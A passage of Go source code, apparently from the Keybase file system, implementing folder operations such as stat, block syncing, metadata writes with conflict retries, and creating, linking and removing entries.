lState, md.ReadOnly(), childPath) if err != nil { return err } if de.Type == Sym { node = nil } else { err = fbo.checkDataVersion(childPath, de.BlockPointer) if err != nil { return err } node, err = fbo.nodeCache.GetOrCreate(de.BlockPointer, name, dir) if err != nil { return err } } return nil }) if err != nil { return nil, EntryInfo{}, err } return node, de.EntryInfo, nil } // statEntry is like Stat, but it returns a DirEntry. This is used by // tests. func (fbo *folderBranchOps) statEntry(ctx context.Context, node Node) ( de DirEntry, err error) { err = fbo.checkNode(node) if err != nil { return DirEntry{}, err } lState := makeFBOLockState() nodePath, err := fbo.pathFromNodeForRead(node) if err != nil { return DirEntry{}, err } var md ImmutableRootMetadata if nodePath.hasValidParent() { md, err = fbo.getMDForReadNeedIdentify(ctx, lState) } else { // If nodePath has no valid parent, it's just the TLF // root, so we don't need an identify in this case. md, err = fbo.getMDForReadNoIdentify(ctx, lState) } if err != nil { return DirEntry{}, err } if nodePath.hasValidParent() { de, err = fbo.blocks.GetDirtyEntry( ctx, lState, md.ReadOnly(), nodePath) if err != nil { return DirEntry{}, err } } else { // nodePath is just the root. de = md.data.Dir } return de, nil } var zeroPtr BlockPointer type blockState struct { blockPtr BlockPointer block Block readyBlockData ReadyBlockData syncedCb func() error } func (fbo *folderBranchOps) Stat(ctx context.Context, node Node) ( ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "Stat %p", node.GetID()) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() var de DirEntry err = runUnlessCanceled(ctx, func() error { de, err = fbo.statEntry(ctx, node) return err }) if err != nil { return EntryInfo{}, err } return de.EntryInfo, nil } func (fbo *folderBranchOps) GetNodeMetadata(ctx context.Context, node Node) ( ei NodeMetadata, err error) { fbo.log.CDebugf(ctx, "GetNodeMetadata %p", node.GetID()) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() var de DirEntry err = runUnlessCanceled(ctx, func() error { de, err = fbo.statEntry(ctx, node) return err }) var res NodeMetadata if err != nil { return res, err } res.BlockInfo = de.BlockInfo uid := de.Writer if uid == keybase1.UID("") { uid = de.Creator } res.LastWriterUnverified, err = fbo.config.KBPKI().GetNormalizedUsername(ctx, uid) if err != nil { return res, err } return res, nil } // blockPutState is an internal structure to track data when putting blocks type blockPutState struct { blockStates []blockState } func newBlockPutState(length int) *blockPutState { bps := &blockPutState{} bps.blockStates = make([]blockState, 0, length) return bps } // addNewBlock tracks a new block that will be put. If syncedCb is // non-nil, it will be called whenever the put for that block is // complete (whether or not the put resulted in an error). Currently // it will not be called if the block is never put (due to an earlier // error). func (bps *blockPutState) addNewBlock(blockPtr BlockPointer, block Block, readyBlockData ReadyBlockData, syncedCb func() error) { bps.blockStates = append(bps.blockStates, blockState{blockPtr, block, readyBlockData, syncedCb}) } func (bps *blockPutState) mergeOtherBps(other *blockPutState) { bps.blockStates = append(bps.blockStates, other.blockStates...) } func (bps *blockPutState) DeepCopy() *blockPutState { newBps := &blockPutState{} newBps.blockStates = make([]blockState, len(bps.blockStates)) copy(newBps.blockStates, bps.blockStates) return newBps } func (fbo *folderBranchOps) readyBlockMultiple(ctx context.Context, kmd KeyMetadata, currBlock Block, uid keybase1.UID, bps *blockPutState) (info BlockInfo, plainSize int, err error) { info, plainSize, readyBlockData, err := fbo.blocks.ReadyBlock(ctx, kmd, currBlock, uid) if err != nil { return } bps.addNewBlock(info.BlockPointer, currBlock, readyBlockData, nil) return } func (fbo *folderBranchOps) unembedBlockChanges( ctx context.Context, bps *blockPutState, md *RootMetadata, changes *BlockChanges, uid keybase1.UID) (err error) { buf, err := fbo.config.Codec().Encode(changes) if err != nil { return } block := NewFileBlock().(*FileBlock) block.Contents = buf info, _, err := fbo.readyBlockMultiple( ctx, md.ReadOnly(), block, uid, bps) if err != nil { return } md.data.cachedChanges = *changes changes.Info = info changes.Ops = nil md.AddRefBytes(uint64(info.EncodedSize)) md.AddDiskUsage(uint64(info.EncodedSize)) return } type localBcache map[BlockPointer]*DirBlock // syncBlock updates, and readies, the blocks along the path for the // given write, up to the root of the tree or stopAt (if specified). // When it updates the root of the tree, it also modifies the given // head object with a new revision number and root block ID. It first // checks the provided lbc for blocks that may have been modified by // previous syncBlock calls or the FS calls themselves. It returns // the updated path to the changed directory, the new or updated // directory entry created as part of the call, and a summary of all // the blocks that now must be put to the block server. // // This function is safe to use unlocked, but may modify MD to have // the same revision number as another one. All functions in this file // must call syncBlockLocked instead, which holds mdWriterLock and // thus serializes the revision numbers. Conflict resolution may call // syncBlockForConflictResolution, which doesn't hold the lock, since // it already handles conflicts correctly. // // entryType must not be Sym. // // TODO: deal with multiple nodes for indirect blocks func (fbo *folderBranchOps) syncBlock( ctx context.Context, lState *lockState, uid keybase1.UID, md *RootMetadata, newBlock Block, dir path, name string, entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer, lbc localBcache) (path, DirEntry, *blockPutState, error) { // now ready each dblock and write the DirEntry for the next one // in the path currBlock := newBlock currName := name newPath := path{ FolderBranch: dir.FolderBranch, path: make([]pathNode, 0, len(dir.path)), } bps := newBlockPutState(len(dir.path)) refPath := dir.ChildPathNoPtr(name) var newDe DirEntry doSetTime := true now := fbo.nowUnixNano() for len(newPath.path) < len(dir.path)+1 { info, plainSize, err := fbo.readyBlockMultiple( ctx, md.ReadOnly(), currBlock, uid, bps) if err != nil { return path{}, DirEntry{}, nil, err } // prepend to path and setup next one newPath.path = append([]pathNode{{info.BlockPointer, currName}}, newPath.path...) // get the parent block prevIdx := len(dir.path) - len(newPath.path) var prevDblock *DirBlock var de DirEntry var nextName string nextDoSetTime := false if prevIdx < 0 { // root dir, update the MD instead de = md.data.Dir } else { prevDir := path{ FolderBranch: dir.FolderBranch, path: dir.path[:prevIdx+1], } // First, check the localBcache, which could contain // blocks that were modified across multiple calls to // syncBlock. var ok bool prevDblock, ok = lbc[prevDir.tailPointer()] if !ok { // If the block isn't in the local bcache, we // have to fetch it, possibly from the // network. Directory blocks are only ever // modified while holding mdWriterLock, so it's // safe to fetch them one at a time. prevDblock, err = fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), prevDir, blockWrite) if err != nil { return path{}, DirEntry{}, nil, err } } // modify the direntry for currName; make one // if it doesn't exist (which should only // happen the first time around). // // TODO: Pull the creation out of here and // into createEntryLocked(). if de, ok = prevDblock.Children[currName]; !ok { // If this isn't the first time // around, we have an error. if len(newPath.path) > 1 { return path{}, DirEntry{}, nil, NoSuchNameError{currName} } // If this is a file, the size should be 0. (TODO: // Ensure this.) If this is a directory, the size will // be filled in below. The times will be filled in // below as well, since we should only be creating a // new directory entry when doSetTime is true. de = DirEntry{ EntryInfo: EntryInfo{ Type: entryType, Size: 0, }, } // If we're creating a new directory entry, the // parent's times must be set as well. nextDoSetTime = true } currBlock = prevDblock nextName = prevDir.tailName() } if de.Type == Dir { // TODO: When we use indirect dir blocks, // we'll have to calculate the size some other // way. de.Size = uint64(plainSize) } if prevIdx < 0 { md.AddUpdate(md.data.Dir.BlockInfo, info) } else if prevDe, ok := prevDblock.Children[currName]; ok { md.AddUpdate(prevDe.BlockInfo, info) } else { // this is a new block md.AddRefBlock(info) } if len(refPath.path) > 1 { refPath = *refPath.parentPath() } de.BlockInfo = info if doSetTime { if mtime { de.Mtime = now } if ctime { de.Ctime = now } } if !newDe.IsInitialized() { newDe = de } if prevIdx < 0 { md.data.Dir = de } else { prevDblock.Children[currName] = de } currName = nextName // Stop before we get to the common ancestor; it will be taken care of // on the next sync call if prevIdx >= 0 && dir.path[prevIdx].BlockPointer == stopAt { // Put this back into the cache as dirty -- the next // syncBlock call will ready it. dblock, ok := currBlock.(*DirBlock) if !ok { return path{}, DirEntry{}, nil, BadDataError{stopAt.ID} } lbc[stopAt] = dblock break } doSetTime = nextDoSetTime } return newPath, newDe, bps, nil } // syncBlockLock calls syncBlock under mdWriterLock. func (fbo *folderBranchOps) syncBlockLocked( ctx context.Context, lState *lockState, uid keybase1.UID, md *RootMetadata, newBlock Block, dir path, name string, entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer, lbc localBcache) (path, DirEntry, *blockPutState, error) { fbo.mdWriterLock.AssertLocked(lState) return fbo.syncBlock(ctx, lState, uid, md, newBlock, dir, name, entryType, mtime, ctime, stopAt, lbc) } // syncBlockForConflictResolution calls syncBlock unlocked, since // conflict resolution can handle MD revision number conflicts // correctly. func (fbo *folderBranchOps) syncBlockForConflictResolution( ctx context.Context, lState *lockState, uid keybase1.UID, md *RootMetadata, newBlock Block, dir path, name string, entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer, lbc localBcache) (path, DirEntry, *blockPutState, error) { return fbo.syncBlock( ctx, lState, uid, md, newBlock, dir, name, entryType, mtime, ctime, stopAt, lbc) } // entryType must not be Sym. func (fbo *folderBranchOps) syncBlockAndCheckEmbedLocked(ctx context.Context, lState *lockState, md *RootMetadata, newBlock Block, dir path, name string, entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer, lbc localBcache) ( path, DirEntry, *blockPutState, error) { fbo.mdWriterLock.AssertLocked(lState) _, uid, err := fbo.config.KBPKI().GetCurrentUserInfo(ctx) if err != nil { return path{}, DirEntry{}, nil, err } newPath, newDe, bps, err := fbo.syncBlockLocked( ctx, lState, uid, md, newBlock, dir, name, entryType, mtime, ctime, stopAt, lbc) if err != nil { return path{}, DirEntry{}, nil, err } // Do the block changes need their own blocks? Unembed only if // this is the final call to this function with this MD. if stopAt == zeroPtr { bsplit := fbo.config.BlockSplitter() if !bsplit.ShouldEmbedBlockChanges(&md.data.Changes) { err = fbo.unembedBlockChanges(ctx, bps, md, &md.data.Changes, uid) if err != nil { return path{}, DirEntry{}, nil, err } } } return newPath, newDe, bps, nil } // Returns whether the given error is one that shouldn't block the // removal of a file or directory. // // TODO: Consider other errors recoverable, e.g. ones that arise from // present but corrupted blocks? func isRecoverableBlockErrorForRemoval(err error) bool { return isRecoverableBlockError(err) } func isRetriableError(err error, retries int) bool { _, isExclOnUnmergedError := err.(ExclOnUnmergedError) _, isUnmergedSelfConflictError := err.(UnmergedSelfConflictError) recoverable := isExclOnUnmergedError || isUnmergedSelfConflictError || isRecoverableBlockError(err) return recoverable && retries < maxRetriesOnRecoverableErrors } func (fbo *folderBranchOps) finalizeBlocks(bps *blockPutState) error { bcache := fbo.config.BlockCache() for _, blockState := range bps.blockStates { newPtr := blockState.blockPtr // only cache this block if we made a brand new block, not if // we just incref'd some other block. if !newPtr.IsFirstRef() { continue } if err := bcache.Put(newPtr, fbo.id(), blockState.block, TransientEntry); err != nil { return err } } return nil } // Returns true if the passed error indicates a revision conflict. func isRevisionConflict(err error) bool { if err == nil { return false } _, isConflictRevision := err.(MDServerErrorConflictRevision) _, isConflictPrevRoot := err.(MDServerErrorConflictPrevRoot) _, isConflictDiskUsage := err.(MDServerErrorConflictDiskUsage) _, isConditionFailed := err.(MDServerErrorConditionFailed) _, isConflictFolderMapping := err.(MDServerErrorConflictFolderMapping) _, isJournal := err.(MDJournalConflictError) return isConflictRevision || isConflictPrevRoot || isConflictDiskUsage || isConditionFailed || isConflictFolderMapping || isJournal } func (fbo *folderBranchOps) finalizeMDWriteLocked(ctx context.Context, lState *lockState, md *RootMetadata, bps *blockPutState, excl Excl) (err error) { fbo.mdWriterLock.AssertLocked(lState) // finally, write out the new metadata mdops := fbo.config.MDOps() doUnmergedPut := true mergedRev := MetadataRevisionUninitialized oldPrevRoot := md.PrevRoot() var mdID MdID // This puts on a delay on any cancellations arriving to ctx. It is intended // to work sort of like a critical section, except that there isn't an // explicit call to exit the critical section. The cancellation, if any, is // triggered after a timeout (i.e. // fbo.config.DelayedCancellationGracePeriod()). // // The purpose of trying to avoid cancellation once we start MD write is to // avoid having an unpredictable perceived MD state. That is, when // runUnlessCanceled returns Canceled on cancellation, application receives // an EINTR, and would assume the operation didn't succeed. But the MD write // continues, and there's a chance the write will succeed, meaning the // operation succeeds. This contradicts with the application's perception // through error code and can lead to horrible situations. An easily caught // situation is when application calls Create with O_EXCL set, gets an EINTR // while MD write succeeds, retries and gets an EEXIST error. If users hit // Ctrl-C, this might not be a big deal. However, it also happens for other // interrupts. For applications that use signals to communicate, e.g. // SIGALRM and SIGUSR1, this can happen pretty often, which renders broken. if err = EnableDelayedCancellationWithGracePeriod( ctx, fbo.config.DelayedCancellationGracePeriod()); err != nil { return err } // we don't explicitly clean up (by using a defer) CancellationDelayer here // because sometimes fuse makes another call using the same ctx. For example, in // fuse's Create call handler, a dir.Create is followed by an Attr call. If // we do a deferred cleanup here, if an interrupt has been received, it can // cause ctx to be canceled before Attr call finishes, which causes FUSE to // return EINTR for the Create request. But at this point, the request may // have already succeeded. Returning EINTR makes application thinks the file // is not created successfully. if fbo.isMasterBranchLocked(lState) { // only do a normal Put if we're not already staged. mdID, err = mdops.Put(ctx, md) if doUnmergedPut = isRevisionConflict(err); doUnmergedPut { fbo.log.CDebugf(ctx, "Conflict: %v", err) mergedRev = md.Revision() if excl == WithExcl { // If this was caused by an exclusive create, we shouldn't do an // UnmergedPut, but rather try to get newest update from server, and // retry afterwards. err = fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdatesLocked) if err != nil { return err } return ExclOnUnmergedError{} } } else if err != nil { return err } } else if excl == WithExcl { return ExclOnUnmergedError{} } if doUnmergedPut { // We're out of date, and this is not an exclusive write, so put it as an // unmerged MD. mdID, err = mdops.PutUnmerged(ctx, md) if isRevisionConflict(err) { // Self-conflicts are retried in `doMDWriteWithRetry`. err = UnmergedSelfConflictError{err} } if err != nil { return err } bid := md.BID() fbo.setBranchIDLocked(lState, bid) fbo.cr.Resolve(md.Revision(), mergedRev) } else { fbo.setBranchIDLocked(lState, NullBranchID) if md.IsRekeySet() && !md.IsWriterMetadataCopiedSet() { // Queue this folder for rekey if the bit was set and it's not a copy. // This is for the case where we're coming out of conflict resolution. // So why don't we do this in finalizeResolution? Well, we do but we don't // want to block on a rekey so we queue it. Because of that it may fail // due to a conflict with some subsequent write. By also handling it here // we'll always retry if we notice we haven't been successful in clearing // the bit yet. Note that I haven't actually seen this happen but it seems // theoretically possible. defer fbo.config.RekeyQueue().Enqueue(md.TlfID()) } } md.swapCachedBlockChanges() err = fbo.finalizeBlocks(bps) if err != nil { return err } rebased := (oldPrevRoot != md.PrevRoot()) if rebased { bid := md.BID() fbo.setBranchIDLocked(lState, bid) fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now()) err = fbo.setHeadSuccessorLocked(ctx, lState, irmd, rebased) if err != nil { return err } // Archive the old, unref'd blocks if journaling is off. if !TLFJournalEnabled(fbo.config, fbo.id()) { fbo.fbm.archiveUnrefBlocks(irmd.ReadOnly()) } fbo.notifyBatchLocked(ctx, lState, irmd) return nil } func (fbo *folderBranchOps) finalizeMDRekeyWriteLocked(ctx context.Context, lState *lockState, md *RootMetadata) (err error) { fbo.mdWriterLock.AssertLocked(lState) oldPrevRoot := md.PrevRoot() // finally, write out the new metadata mdID, err := fbo.config.MDOps().Put(ctx, md) isConflict := isRevisionConflict(err) if err != nil && !isConflict { return err } if isConflict { // drop this block. we've probably collided with someone also // trying to rekey the same folder but that's not necessarily // the case. we'll queue another rekey just in case. it should // be safe as it's idempotent. we don't want any rekeys present // in unmerged history or that will just make a mess. fbo.config.RekeyQueue().Enqueue(md.TlfID()) return RekeyConflictError{err} } fbo.setBranchIDLocked(lState, NullBranchID) rebased := (oldPrevRoot != md.PrevRoot()) if rebased { bid := md.BID() fbo.setBranchIDLocked(lState, bid) fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) } md.swapCachedBlockChanges() fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) return fbo.setHeadSuccessorLocked(ctx, lState, MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now()), rebased) } func (fbo *folderBranchOps) finalizeGCOp(ctx context.Context, gco *gcOp) ( err error) { lState := makeFBOLockState() // Lock the folder so we can get an internally-consistent MD // revision number. fbo.mdWriterLock.Lock(lState) defer fbo.mdWriterLock.Unlock(lState) md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } if md.MergedStatus() == Unmerged { return UnexpectedUnmergedPutError{} } md.AddOp(gco) if err := fbo.maybeUnembedAndPutOneBlock(ctx, md); err != nil { return err } oldPrevRoot := md.PrevRoot() // finally, write out the new metadata mdID, err := fbo.config.MDOps().Put(ctx, md) if err != nil { // Don't allow garbage collection to put us into a conflicting // state; just wait for the next period. return err } fbo.setBranchIDLocked(lState, NullBranchID) md.swapCachedBlockChanges() rebased := (oldPrevRoot != md.PrevRoot()) if rebased { bid := md.BID() fbo.setBranchIDLocked(lState, bid) fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized) } fbo.headLock.Lock(lState) defer fbo.headLock.Unlock(lState) irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now()) err = fbo.setHeadSuccessorLocked(ctx, lState, irmd, rebased) if err != nil { return err } fbo.notifyBatchLocked(ctx, lState, irmd) return nil } func (fbo *folderBranchOps) syncBlockAndFinalizeLocked(ctx context.Context, lState *lockState, md *RootMetadata, newBlock Block, dir path, name string, entryType EntryType, mtime bool, ctime bool, stopAt BlockPointer, excl Excl) (de DirEntry, err error) { fbo.mdWriterLock.AssertLocked(lState) _, de, bps, err := fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, newBlock, dir, name, entryType, mtime, ctime, zeroPtr, nil) if err != nil { return DirEntry{}, err } defer func() { if err != nil { fbo.fbm.cleanUpBlockState( md.ReadOnly(), bps, blockDeleteOnMDFail) } }() _, err = doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *bps) if err != nil { return DirEntry{}, err } err = fbo.finalizeMDWriteLocked(ctx, lState, md, bps, excl) if err != nil { return DirEntry{}, err } return de, nil } func checkDisallowedPrefixes(name string) error { for _, prefix := range disallowedPrefixes { if strings.HasPrefix(name, prefix) { return DisallowedPrefixError{name, prefix} } } return nil } func (fbo *folderBranchOps) checkNewDirSize(ctx context.Context, lState *lockState, md ReadOnlyRootMetadata, dirPath path, newName string) error { // Check that the directory isn't past capacity already. var currSize uint64 if dirPath.hasValidParent() { de, err := fbo.blocks.GetDirtyEntry(ctx, lState, md, dirPath) if err != nil { return err } currSize = de.Size } else { // dirPath is just the root. currSize = md.data.Dir.Size } // Just an approximation since it doesn't include the size of the // directory entry itself, but that's ok -- at worst it'll be an // off-by-one-entry error, and since there's a maximum name length // we can't get in too much trouble. if currSize+uint64(len(newName)) > fbo.config.MaxDirBytes() { return DirTooBigError{dirPath, currSize + uint64(len(newName)), fbo.config.MaxDirBytes()} } return nil } // PathType returns path type func (fbo *folderBranchOps) PathType() PathType { if fbo.folderBranch.Tlf.IsPublic() { return PublicPathType } return PrivatePathType } // canonicalPath returns full canonical path for dir node and name. func (fbo *folderBranchOps) canonicalPath(ctx context.Context, dir Node, name string) (string, error) { dirPath, err := fbo.pathFromNodeForRead(dir) if err != nil { return "", err } return BuildCanonicalPath(fbo.PathType(), dirPath.String(), name), nil } // entryType must not by Sym. func (fbo *folderBranchOps) createEntryLocked( ctx context.Context, lState *lockState, dir Node, name string, entryType EntryType, excl Excl) (Node, DirEntry, error) { fbo.mdWriterLock.AssertLocked(lState) if err := checkDisallowedPrefixes(name); err != nil { return nil, DirEntry{}, err } if uint32(len(name)) > fbo.config.MaxNameBytes() { return nil, DirEntry{}, NameTooLongError{name, fbo.config.MaxNameBytes()} } if excl == WithExcl { if err := WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log); err != nil { return nil, DirEntry{}, err } } filename, err := fbo.canonicalPath(ctx, dir, name) if err != nil { return nil, DirEntry{}, err } // verify we have permission to write md, err := fbo.getMDForWriteLockedForFilename(ctx, lState, filename) if err != nil { return nil, DirEntry{}, err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return nil, DirEntry{}, err } dblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dirPath, blockWrite) if err != nil { return nil, DirEntry{}, err } // does name already exist? if _, ok := dblock.Children[name]; ok { return nil, DirEntry{}, NameExistsError{name} } if err := fbo.checkNewDirSize( ctx, lState, md.ReadOnly(), dirPath, name); err != nil { return nil, DirEntry{}, err } co, err := newCreateOp(name, dirPath.tailPointer(), entryType) if err != nil { return nil, DirEntry{}, err } md.AddOp(co) // create new data block var newBlock Block // XXX: for now, put a unique ID in every new block, to make sure it // has a unique block ID. This may not be needed once we have encryption. if entryType == Dir { newBlock = &DirBlock{ Children: make(map[string]DirEntry), } } else { newBlock = &FileBlock{} } // Passthrough journal writes temporarily. if excl == WithExcl { if jServer, err := GetJournalServer(fbo.config); err == nil { // Repeatedly flush and try to disable the journal. Since // we hold the write lock, this shouldn't take more than // one attempt very often (but could happen since block // archives and removals don't take the write lock). // TODO: this opens us up to timeout issues; perhaps // investigate how we can re-order file system operations // easily without compromising semantics too much (i.e., // to jump this operation to the front of the journal). wasEnabled := false for i := 0; i < 20; i++ { err = WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log) if err != nil { return nil, DirEntry{}, err } wasEnabled, err = jServer.Disable(ctx, fbo.id()) if err == nil { // TODO: there is a theoretical race here if a // user re-enables the journal directly via the // JournalServer through a file system interface. // Maybe we should create a way to lock down // enables except for the goroutine that called // Disable (using a channel or function returned // from Disable, for example). break } fbo.log.CDebugf(ctx, "Trying again after error "+ "disabling journal: %v", err) } if err != nil { fbo.log.CDebugf(ctx, "Couldn't disable journal: %v", err) return nil, DirEntry{}, err } if wasEnabled { defer func() { // TODO: check whether it had been paused when we // disabled it, so we can start it without // background work enabled? if err := jServer.Enable(ctx, fbo.id(), TLFJournalBackgroundWorkEnabled); err != nil { fbo.log.CDebugf(ctx, "Couldn't re-enable journal: %v", err) } }() } } } de, err := fbo.syncBlockAndFinalizeLocked( ctx, lState, md, newBlock, dirPath, name, entryType, true, true, zeroPtr, excl) if err != nil { return nil, DirEntry{}, err } node, err := fbo.nodeCache.GetOrCreate(de.BlockPointer, name, dir) if err != nil { return nil, DirEntry{}, err } return node, de, nil } func (fbo *folderBranchOps) doMDWriteWithRetry(ctx context.Context, lState *lockState, fn func(lState *lockState) error) error { doUnlock := false defer func() { if doUnlock { fbo.mdWriterLock.Unlock(lState) } }() for i := 0; ; i++ { fbo.mdWriterLock.Lock(lState) doUnlock = true // Make sure we haven't been canceled before doing anything // too serious. select { case <-ctx.Done(): return ctx.Err() default: } err := fn(lState) if isRetriableError(err, i) { fbo.log.CDebugf(ctx, "Trying again after retriable error: %v", err) // Release the lock to give someone else a chance doUnlock = false fbo.mdWriterLock.Unlock(lState) if _, ok := err.(ExclOnUnmergedError); ok { if err = fbo.cr.Wait(ctx); err != nil { return err } } else if _, ok := err.(UnmergedSelfConflictError); ok { // We can only get here if we are already on an // unmerged branch and an errored PutUnmerged did make // it to the mdserver. Let's force sync, with a fresh // context so the observer doesn't ignore the updates // (but tie the cancels together). newCtx := fbo.ctxWithFBOID(context.Background()) newCtx, cancel := context.WithCancel(newCtx) defer cancel() go func() { select { case <-ctx.Done(): cancel() case <-newCtx.Done(): } }() fbo.log.CDebugf(ctx, "Got a revision conflict while unmerged "+ "(%v); forcing a sync", err) err = fbo.getAndApplyNewestUnmergedHead(newCtx, lState) if err != nil { return err } cancel() } continue } else if err != nil { return err } return nil } } func (fbo *folderBranchOps) doMDWriteWithRetryUnlessCanceled( ctx context.Context, fn func(lState *lockState) error) error { return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() return fbo.doMDWriteWithRetry(ctx, lState, fn) }) } func (fbo *folderBranchOps) CreateDir( ctx context.Context, dir Node, path string) ( n Node, ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateDir %p %s", dir.GetID(), path) defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { fbo.deferLog.CDebugf(ctx, "Done: %p", n.GetID()) } }() err = fbo.checkNode(dir) if err != nil { return nil, EntryInfo{}, err } var retNode Node var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { node, de, err := fbo.createEntryLocked(ctx, lState, dir, path, Dir, NoExcl) // Don't set node and ei directly, as that can cause a // race when the Create is canceled. retNode = node retEntryInfo = de.EntryInfo return err }) if err != nil { return nil, EntryInfo{}, err } return retNode, retEntryInfo, nil } func (fbo *folderBranchOps) CreateFile( ctx context.Context, dir Node, path string, isExec bool, excl Excl) ( n Node, ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateFile %p %s isExec=%v Excl=%s", dir.GetID(), path, isExec, excl) defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { fbo.deferLog.CDebugf(ctx, "Done: %p", n.GetID()) } }() err = fbo.checkNode(dir) if err != nil { return nil, EntryInfo{}, err } var entryType EntryType if isExec { entryType = Exec } else { entryType = File } if excl == WithExcl { if err = fbo.cr.Wait(ctx); err != nil { return nil, EntryInfo{}, err } } var retNode Node var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // Don't set node and ei directly, as that can cause a // race when the Create is canceled. node, de, err := fbo.createEntryLocked(ctx, lState, dir, path, entryType, excl) retNode = node retEntryInfo = de.EntryInfo return err }) if err != nil { return nil, EntryInfo{}, err } return retNode, retEntryInfo, nil } func (fbo *folderBranchOps) createLinkLocked( ctx context.Context, lState *lockState, dir Node, fromName string, toPath string) (DirEntry, error) { fbo.mdWriterLock.AssertLocked(lState) if err := checkDisallowedPrefixes(fromName); err != nil { return DirEntry{}, err } if uint32(len(fromName)) > fbo.config.MaxNameBytes() { return DirEntry{}, NameTooLongError{fromName, fbo.config.MaxNameBytes()} } // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return DirEntry{}, err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return DirEntry{}, err } dblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dirPath, blockWrite) if err != nil { return DirEntry{}, err } // TODO: validate inputs // does name already exist? if _, ok := dblock.Children[fromName]; ok { return DirEntry{}, NameExistsError{fromName} } if err := fbo.checkNewDirSize(ctx, lState, md.ReadOnly(), dirPath, fromName); err != nil { return DirEntry{}, err } co, err := newCreateOp(fromName, dirPath.tailPointer(), Sym) if err != nil { return DirEntry{}, err } md.AddOp(co) // Create a direntry for the link, and then sync now := fbo.nowUnixNano() dblock.Children[fromName] = DirEntry{ EntryInfo: EntryInfo{ Type: Sym, Size: uint64(len(toPath)), SymPath: toPath, Mtime: now, Ctime: now, }, } _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, dblock, *dirPath.parentPath(), dirPath.tailName(), Dir, true, true, zeroPtr, NoExcl) if err != nil { return DirEntry{}, err } return dblock.Children[fromName], nil } func (fbo *folderBranchOps) CreateLink( ctx context.Context, dir Node, fromName string, toPath string) ( ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateLink %p %s -> %s", dir.GetID(), fromName, toPath) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return EntryInfo{}, err } var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // Don't set ei directly, as that can cause a race when // the Create is canceled. de, err := fbo.createLinkLocked(ctx, lState, dir, fromName, toPath) retEntryInfo = de.EntryInfo return err }) if err != nil { return EntryInfo{}, err } return retEntryInfo, nil } // unrefEntry modifies md to unreference all relevant blocks for the // given entry. func (fbo *folderBranchOps) unrefEntry(ctx context.Context, lState *lockState, md *RootMetadata, dir path, de DirEntry, name string) error { md.AddUnrefBlock(de.BlockInfo) // construct a path for the child so we can unlink with it. childPath := dir.ChildPath(name, de.BlockPointer) // If this is an indirect block, we need to delete all of its // children as well. NOTE: non-empty directories can't be // removed, so no need to check for indirect directory blocks // here. if de.Type == File || de.Type == Exec { blockInfos, err := fbo.blocks.GetIndirectFileBlockInfos( ctx, lState, md.ReadOnly(), childPath) if isRecoverableBlockErrorForRemoval(err) { msg := fmt.Sprintf("Recoverable block error encountered for unrefEntry(%v); continuing", childPath) fbo.log.CWarningf(ctx, "%s", msg) fbo.log.CDebugf(ctx, "%s (err=%v)", msg, err) } else if err != nil { return err } for _, blockInfo := range blockInfos { md.AddUnrefBlock(blockInfo) } } return nil } func (fbo *folderBranchOps) removeEntryLocked(ctx context.Context, lState *lockState, md *RootMetadata, dir path, name string) error { fbo.mdWriterLock.AssertLocked(lState) pblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dir, blockWrite) if err != nil { return err } // make sure the entry exists de, ok := pblock.Children[name] if !ok { return NoSuchNameError{name} } ro, err := newRmOp(name, dir.tailPointer()) if err != nil { return err } md.AddOp(ro) err = fbo.unrefEntry(ctx, lState, md, dir, de, name) if err != nil { return err } // the actual unlink delete(pblock.Children, name) // sync the parent directory _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, pblock, *dir.parentPath(), dir.tailName(), Dir, true, true, zeroPtr, NoExcl) if err != nil { return err } return nil } func (fbo *folderBranchOps) removeDirLocked(ctx context.Context, lState *lockState, dir Node, dirName string) (err error) { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return err } pblock, err := fbo.blocks.GetDir( ctx, lState, 